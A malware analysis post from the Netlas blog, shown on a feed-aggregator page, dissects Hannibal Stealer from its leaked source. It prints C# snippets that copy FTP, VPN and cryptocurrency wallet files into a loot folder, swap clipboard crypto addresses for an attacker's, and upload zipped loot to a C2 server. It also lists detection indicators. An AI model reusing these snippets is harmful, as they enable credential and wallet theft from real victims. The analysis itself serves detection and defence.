惯性聚合 高效追踪和阅读你感兴趣的博客、新闻、科技资讯
阅读原文 在惯性聚合中打开

推荐订阅源

H
Hackread – Cybersecurity News, Data Breaches, AI and More
Security Archives - TechRepublic
Security Archives - TechRepublic
I
Intezer
Threat Intelligence Blog | Flashpoint
Threat Intelligence Blog | Flashpoint
C
CXSECURITY Database RSS Feed - CXSecurity.com
A
Arctic Wolf
T
Threatpost
P
Proofpoint News Feed
AWS News Blog
AWS News Blog
C
Cybersecurity and Infrastructure Security Agency CISA
G
GRAHAM CLULEY
Cisco Talos Blog
Cisco Talos Blog
Simon Willison's Weblog
Simon Willison's Weblog
L
Lohrmann on Cybersecurity
Scott Helme
Scott Helme
T
Tenable Blog
L
LINUX DO - 最新话题
Help Net Security
Help Net Security
WordPress大学
WordPress大学
Hacker News: Ask HN
Hacker News: Ask HN
人人都是产品经理
人人都是产品经理
MyScale Blog
MyScale Blog
Recent Commits to openclaw:main
Recent Commits to openclaw:main
D
Darknet – Hacking Tools, Hacker News & Cyber Security
Recent Announcements
Recent Announcements
Vercel News
Vercel News
The Hacker News
The Hacker News
J
Java Code Geeks
博客园 - 【当耐特】
D
Docker
V
V2EX
H
Heimdal Security Blog
GbyAI
GbyAI
博客园 - 叶小钗
Google DeepMind News
Google DeepMind News
OSCHINA 社区最新新闻
OSCHINA 社区最新新闻
N
News | PayPal Newsroom
The Register - Security
The Register - Security
The Cloudflare Blog
C
CERT Recently Published Vulnerability Notes
T
The Blog of Author Tim Ferriss
博客园 - Franky
MongoDB | Blog
MongoDB | Blog
SecWiki News
SecWiki News
S
Secure Thoughts
Attack and Defense Labs
Attack and Defense Labs
Microsoft Security Blog
Microsoft Security Blog
S
Schneier on Security
Latest news
Latest news
Project Zero
Project Zero

Mapping the <mark>Internet</mark> on Netlas: Comprehensive Internet-Wide Scanning & OSINT Platform

Weaponized RMM: Hunting the Adversary Abuse of Remote Monitoring Tools Device Code Phishing: Technical Analysis and Proactive Hunting via Netlas Discovering Data Exposure with Netlas Telegram Bot API Abuse - Netlas Blog Using OWASP Amass with Netlas Module - Netlas Blog How we hunt C2 infrastructure at RST Cloud using Netlas - Netlas Blog Using Uncover with Netlas.io module - Netlas Blog Netlas Updates Terms and API & Data License Agreement - Netlas Blog Top 10 Hacking Devices for Ethical Hackers in 2026 - Netlas Blog Inside ClickFix: How Fake Prompts Took Over the Web Top 10 Critical Threat Actors to Watch in 2026: Ransomware, APTs & Defensive Strategies - Netlas Blog Bug Bounty 101 - A Complete Bug Bounty Roadmap for Beginners (2026) - Netlas Blog Supply Chain Attack - How Attackers Weaponize Software Supply Chains - Netlas Blog The Evolution of C2: Centralized to On-Chain - Netlas Blog From Starlink to Star Wars - The Real Cyber Threats in Space - Netlas Blog LLM Vulnerabilities: Why AI Models Are the Next Big Attack Surface - Netlas Blog When AI Turns Criminal: Deepfakes, Voice-Cloning & LLM Malware - Netlas Blog Zero-Click Exploits - Netlas Blog When Patches Fail: An Analysis of Patch Bypass and Incomplete Security - Netlas Blog I Analysed Over 3 Million Exposed Databases Using Netlas - Netlas Blog Post-Quantum Now: From AES & RSA to ML-KEM Hybrids - Netlas Blog Bug Bounty 101: Top 10 Reconnaissance Tools - Netlas Blog Mapping Dark Web Infrastructure - Netlas Blog Top Vibe-Coding Security Risks - Netlas Blog From Chaos to Control: Kanvas Incident Management Tool - Netlas Blog Bug Bounty 101: The Best Courses to Get Started in 2025 - Netlas Blog I, Robot + NIST AI RMF = Complete Guide on Preventing Robot Rebellion - Netlas Blog The $1.5B Bybit Hack & How OSINT Led to Its Attribution - Netlas Blog Proactive Threat Hunting: Techniques to Identify Malicious Infrastructure - Netlas Blog The Pyramid of Pain: Beyond the Basics - Netlas Blog SOCMINT: Intelligence in the Social Media Era - Netlas Blog Hannibal Stealer vs. Browser Security - Netlas Blog The Largest Data Breach Ever? How Hackers Stole 16 Billion Credentials - Netlas Blog DNS Cache Poisoning – Is It Still Relevant? - Netlas Blog Modern Cybercrime: Who’s Behind It and Who’s Stopping It - Netlas Blog AI-Driven Attack Surface Discovery - Netlas Blog Netlas vs Urlscan: Tools Comparison - Netlas Blog Track Adversary Infrastructure Challenge 2025 Recap - Netlas Blog What is Threat Intelligence - Netlas Blog Netlas vs IPinfo: Tools Comparison - Netlas Blog Best Nmap Alternatives - Netlas Blog Whois History: How to Check the Domain Owner History - Netlas Blog Top WHOIS & RDAP Tools for Fast IP Address Lookup - Netlas Blog ASN Lookup Explained: Tools, Methods & Insights - Netlas Blog How to Detect CVEs Using Nmap Vulnerability Scan Scripts - Netlas Blog Nmap Cheat Sheet: Top 10 Scan Techiques - Netlas Blog Netlas vs ZoomEye: Platforms Comparison - Netlas Blog Top 6 Most Widely Used Port Scanners in Cybersecurity - Netlas Blog FAQ: Understanding Root DNS Servers and the Root Zone - Netlas Blog Domain Recon: Must-Know Tools for Security Professionals - Netlas Blog DNS History: Exploring Domains Past by Inspecting DNS Trails - Netlas Blog DNSSEC: Should You Use It? An Expert’s View on the Pros, Cons, and When to Implement - Netlas Blog Which DNS Servers Offer the Best Balance of Speed, Security, and Privacy? - Netlas Blog theHarvester: a Classic Open Source Intelligence Tool - Netlas Blog - Netlas Blog Top 15 OSINT Tools for Expert Intelligence Gathering - Netlas Blog A Deep Dive into the Open Web Application Security Project Top 10 Vulnerabilities - Netlas Blog Using Subfinder with Netlas Module - Netlas Blog Netlas Chrome and Firefox Extensions - Netlas Blog Netlas vs Censys: Platforms Comparison - Netlas Blog OSINT in Cybersecurity: Exploring Its Spectrum and Tech - Netlas Blog Best Honeypots for Detecting Network Threats - Netlas Blog Using Maltego with Netlas Module - Netlas Blog Using theHarvester with Netlas - Netlas Blog Using TLDFinder with Netlas - Netlas Blog Netlas vs Fofa: Platforms Comparison - Netlas Blog Netlas vs Shodan: Platforms Comparison - Netlas Blog Google Dorking in Cybersecurity - Netlas Blog 7 Tools for Web Penetration Testing - Netlas Blog Using DNS History in Cybersecurity - Netlas Blog Mastering Online Camera Searches - Netlas Blog Best Attack Surface Visualization Tools - Netlas Blog Complete Guide on Attack Surface Discovery - Netlas Blog How to find unprotected databases with Netlas.io: Chapter 2 - Netlas Blog
Hannibal Stealer: A Deep Technical Analysis - Netlas Blog
Bedrettin Ortak · 2025-08-01 · via Mapping the <mark>Internet</mark> on Netlas: Comprehensive Internet-Wide Scanning & OSINT Platform

In the previous post, we explored how Hannibal Stealer bypasses modern browser protections to access and steal cookies. Now, it’s time to take a broader look at this malware — examining its overall design, evolution, attack methods, and real-world implications. Below is our in-depth analysis, based directly on the leaked source code we reviewed.

Stealer Lineage: From Sharp & TX to Hannibal

Hannibal Stealer’s source code has clear signs that it was developed directly from two earlier .NET-based infostealers called Sharp Stealer and TX Stealer. The malware’s internal namespace is still labeled as SHARP, and we also encountered the ASCII banner:

// Excerpt from SystemInfo.cs
Console.WriteLine(@"<--- CoderSharp --->");

Apparently, the core functions – such as cookie theft modules, credential harvesting, and system profiling – remain mostly unchanged from the original Sharp/TX Stealers. The main alteration we identified was in its data exfiltration mechanism: Hannibal switched from Telegram-based exfiltration (used in earlier variants) to utilizing either an attacker-controlled HTTP server or Telegram bots, selectable via a configuration setting.

The comparison table below highlights significant changes that enhance the modern version’s practicality and operational effectiveness compared to its predecessors.

Feature / BehaviorSharp Stealer / TXHannibal Stealer
Exfiltration MethodTelegram channels (plaintext dump)Telegram Bot API, and HTTP POST (configurable)
Encryption Key HandlingLimited to DPAPI (Chrome v10)Chrome v20 support via process injection
Data TargetingBasic: passwords, cookiesExpanded: FTP creds, VPNs, crypto wallets
Target FilteringNo filteringDomain-based filtering (e.g., paypal.com)
Persistence LogicBundledRemoved from code
Codebase ModularityMonolithic classesModularized
ObfuscationNoneMinor naming obfuscation
Extension AwarenessNoneIncludes browser extension enumeration logic

Where Sharp Stealer felt more like a proof-of-concept or a skiddie tool, Hannibal is closer to a deployable operation kit. It’s more modular, better organized, and can be tailored by skilled operators.

The main areas of improvement we found include:

  • App-Bound Encryption (V20) bypass: Includes DLL injection or COM interface usage to extract Chrome cookies even with enhanced encryption.

  • Exfiltration Methods: Operators choose between Telegram or C2 servers for data exfiltration.

  • Data enrichment: Hannibal adds tags, counts, and folder structures to organize stolen data.

Recommended Reading

Hannibal Stealer vs. Browser Security

Attack Chain & Workflow

We reconstructed Hannibal’s complete attack chain by analyzing each section of the leaked source code.

Initial Compromise Vector

Hannibal does not have its own built-in infection mechanism. This means that attackers distributing Hannibal would rely on phishing campaigns or malicious downloads disguised as legitimate software. These loaders or droppers run Hannibal directly on the victim’s system.

Inforgraphic for Attack Chain & Workflow

Persistence and Privilege Checks

Hannibal either does not explicitly implement persistence itself. The malware primarily operates as a single-instance data-stealing session. However, persistence mechanisms could be deployed externally by the third-party loaders/droppers via scheduled tasks, registry entries, or startup folders.

We did find a marker-based mutex mechanism to ensure a single instance execution:

// Help.Start() function example
if (File.Exists(Environment.GetFolderPath(Environment.SpecialFolder.LocalApplicationData) + @"\CefSharp\lock"))
    Environment.Exit(0);
else
    File.WriteAllText(Environment.GetFolderPath(Environment.SpecialFolder.LocalApplicationData) + @"\CefSharp\lock", "running");

System Profiling & Evasion

On execution, Hannibal gathers detailed victim information (hostname, IP, geolocation, antivirus software, clipboard contents, etc.) to profile the infected system.

var hostName = Environment.MachineName;
var userName = Environment.UserName;
var ip = new WebClient().DownloadString("https://api.ipify.org");

To evade detection, Hannibal masquerades as a legitimate Chromium subprocess (CefSharp.BrowsersSubprocess.exe), which helps it blend into the user’s environment. This feature was previously described in my earlier article.

High-Value Data Prioritization

One interesting finding was Hannibal’s built-in high-value target filtering. After extracting browser data, it scans credential dumps specifically for valuable domains like financial services or cryptocurrency exchanges:

string[] for_search = { "paypal.com", "binance.com", "coinbase.com" /*...*/ };

foreach (string domain in for_search)
{
    if (stolenData.Contains(domain))
        MarkHighValue(domain);
}

This prioritization technique helps attackers by focusing their attention immediately on the most valuable stolen credentials.

FTP Credential Theft

Hannibal Stealer’s codebase contains a few modules specifically designed to extract credentials and configuration files from commonly used FTP clients.

We found support for two popular FTP clients:

  • FileZilla
  • Total Commander.

FileZilla’s implementation includes searching the victim’s system for FileZilla’s recentservers.xml file, containing plaintext or base64-encoded FTP server credentials:

// Example: Extracting FileZilla FTP credentials
string fileZillaPath = Path.Combine(Environment.GetFolderPath(Environment.SpecialFolder.ApplicationData), "FileZilla", "recentservers.xml");

if (File.Exists(fileZillaPath))
{
    File.Copy(fileZillaPath, stolenDataDir + "\\FileZilla_recentservers.xml");
    IncrementFTPCount();
}

The Total Commander FTP related code copies the wcx_ftp.ini file, which contains FTP server addresses, usernames, and encoded passwords.

// Extracting Total Commander FTP credentials
string tcFtpPath = Path.Combine(Environment.GetFolderPath(Environment.SpecialFolder.ApplicationData), "GHISLER", "wcx_ftp.ini");

if (File.Exists(tcFtpPath))
{
    File.Copy(tcFtpPath, stolenDataDir + "\\TotalCommander_wcx_ftp.ini");
    IncrementFTPCount();
}

VPN Credential and Configuration Theft

Hannibal also aims to VPN applications. It locates configuration directories and files associated with popular VPN clients, including:

  • NordVPN
  • ExpressVPN
  • CyberGhost OpenVPN
  • ProtonVPN
  • Private Internet Access

Here’s a snippet illustrating how Hannibal locates and steals CyberGhost VPN configuration data:

// CyberGhost VPN credentials theft
string cyberGhostPath = Path.Combine(Environment.GetFolderPath(Environment.SpecialFolder.LocalApplicationData), "CyberGhost");

if (Directory.Exists(cyberGhostPath))
{
    CopyDirectory(cyberGhostPath, Path.Combine(stolenDataDir, "CyberGhost"));
    IncrementVPNCount();
}

Similarly, ExpressVPN configurations are targeted by copying the entire configuration directory:

// ExpressVPN credential extraction
string expressVPNPath = Path.Combine(Environment.GetFolderPath(Environment.SpecialFolder.LocalApplicationData), "ExpressVPN");

if (Directory.Exists(expressVPNPath))
{
    CopyDirectory(expressVPNPath, Path.Combine(stolenDataDir, "ExpressVPN"));
    IncrementVPNCount();
}

The listed VPN services are primarily intended for personal use. We suggest that attackers could exploit them for their own purposes, such as incorporating them into their operations or reselling them for profit.

Infographic of prioritization for High-Value Data

Cryptocurrency Wallet Theft

Hannibal Stealer’s source code contains a few modules for explicit support of some cryptocurrency wallets. These modules are intended for extracting wallet files, seed phrases, private keys, and related configuration data from popular wallet software.

Wallets Targeted by Hannibal Stealer:

  • Bitcoin Core
  • Electrum
  • Litecoin Core
  • Exodus
  • Atomic Wallet
  • Monero
  • Ethereum (Mist, MyCrypto, MyEtherWallet)
  • Dash Core
  • Zcash
  • Jaxx

One notable example is the extraction of the Bitcoin Core wallet file (wallet.dat), which contains users’ private keys. Hannibal retrieves the file location from the Windows Registry and then copies the wallet file directly into its loot directory:

// Bitcoin Core wallet theft
RegistryKey btcReg = Registry.CurrentUser.OpenSubKey(@"Software\Bitcoin\Bitcoin-Qt");
string btcWalletPath = btcReg?.GetValue("strDataDir")?.ToString();

if (!string.IsNullOrEmpty(btcWalletPath))
{
    string walletFile = Path.Combine(btcWalletPath, "wallet.dat");
    if (File.Exists(walletFile))
    {
        File.Copy(walletFile, stolenDataDir + "\\BitcoinCore_wallet.dat");
        IncrementWalletCount();
    }
}

Similarly, Hannibal directly targets Electrum wallets, extracting the wallet files which store seed phrases or encrypted private keys:

// Electrum wallet theft
string electrumWalletPath = Path.Combine(Environment.GetFolderPath(Environment.SpecialFolder.ApplicationData), "Electrum", "wallets");

if (Directory.Exists(electrumWalletPath))
{
    CopyDirectory(electrumWalletPath, Path.Combine(stolenDataDir, "ElectrumWallets"));
    IncrementWalletCount();
}

Clipboard Hijacking for Cryptocurrency Transactions

Additionally, our analysis uncovered Hannibal’s built-in clipboard hijacking mechanism (crypto clipper). The malware monitors the victim’s clipboard, detects cryptocurrency addresses, and stealthily replaces them with attacker-controlled addresses. Thus, any victim inadvertently sending cryptocurrency transactions could unknowingly send funds directly to the attacker’s wallet:

// Clipboard Hijacking snippet
string clipboardText = Clipboard.GetText();

if (Regex.IsMatch(clipboardText, bitcoinRegexPattern))
{
    Clipboard.SetText(attackerBitcoinAddress);
}

Data Exfiltration Steps

Finally, Hannibal compresses stolen data into ZIP archives and sends it to a command-and-control server or Telegram bot, depending on its configuration. These archives are not password-protected. No compression or encryption beyond simple ZIP.

 ZipFile.CreateFromDirectory(stolenDataPath, zipFilePath);
using (var wc = new WebClient())
{
    wc.UploadFile(C2Url, zipFilePath);
}

Hannibal Stealer Collected Files Hannibal Stealer Collected Files

Recommended Reading

Proactive Threat Hunting: Techniques to Identify Malicious Infrastructure

Self-Security Features

In this final section, we analyze Hannibal Stealer’s design from a malware analysis perspective, evaluating standard features such as anti-AV tactics, self-encryption, and secure C2 communications.

Lack of Code Obfuscation or Polymorphism

The studied codebase was not obfuscated at all. Namespaces and method names are mostly intact, such as:

  • SHARP.BRWSR
  • GetCookies()
  • WritePasswords()

Considering that the C# language is used for development, this makes it easier to reverse-engineer. I didn’t find any signs of polymorphism being used either.

Antivirus Evasion Techniques

Hannibal exhibits minimal stealth techniques:

  • ❌ No process hollowing or reflective DLL injection
  • ❌ No API unhooking
  • ❌ No in-memory or fileless execution
  • ✅ Browser data is accessed via direct filesystem reads (File.Copy, SQLiteHandler)
  • ✅ Temporarily copies locked browser files to Temp before reading

YARA Rules and IOC Patterns

Due to its static and unprotected structure, Hannibal exposes many detectable indicators:

  • Hardcoded strings like:
    • t.me/CoderSharp
    • SHARP
    • Targeted browser folder names (e.g., Google, Opera)
  • Extracted file names:
    • FileZilla_recentservers.xml
    • TotalCommander_wcx_ftp.ini
    • wallet.dat from the wallet directories
  • Function names:
    • GetEncryptionKey()
    • DecryptData()
    • GetPasswords()

These make it straightforward to write effective YARA rules.

Summary Table

FeatureExists in Hannibal?Notes
TLS/HTTPS Encryption✔️No cert validation; accepts self-signed certs
Data Encryption on ExfiltrationZIP files are plain and unencrypted
Application EncryptionCould be implemented by loader/dropper
PolymorphismStatic code, no signs of polymorphism usage
AV EvasionNo packing, injection, or unhooking techniques
Detectable Signatures✔️Static strings and predictable file artifacts

Conclusion

From our analysis perspective, Hannibal Stealer is notable for its effectiveness in bypassing modern browser security measures like Chrome’s cookie encryption and multi-factor authentication protections. By capturing session cookies directly from memory, Hannibal facilitates instant account takeover without requiring credentials or bypassing traditional authentication measures.

On the other hand, we do not observe any strong anti-AV techniques, such as self-encryption or embedded rootkit features. This suggests one of two possibilities: either it can be easily stopped by modern AV solutions, or it is used in conjunction with other tools that implement these features.

What is your choise

I can show you how deep the Internet really goes

Discover exposed assets, infrastructure links, and threat surfaces across the global Internet.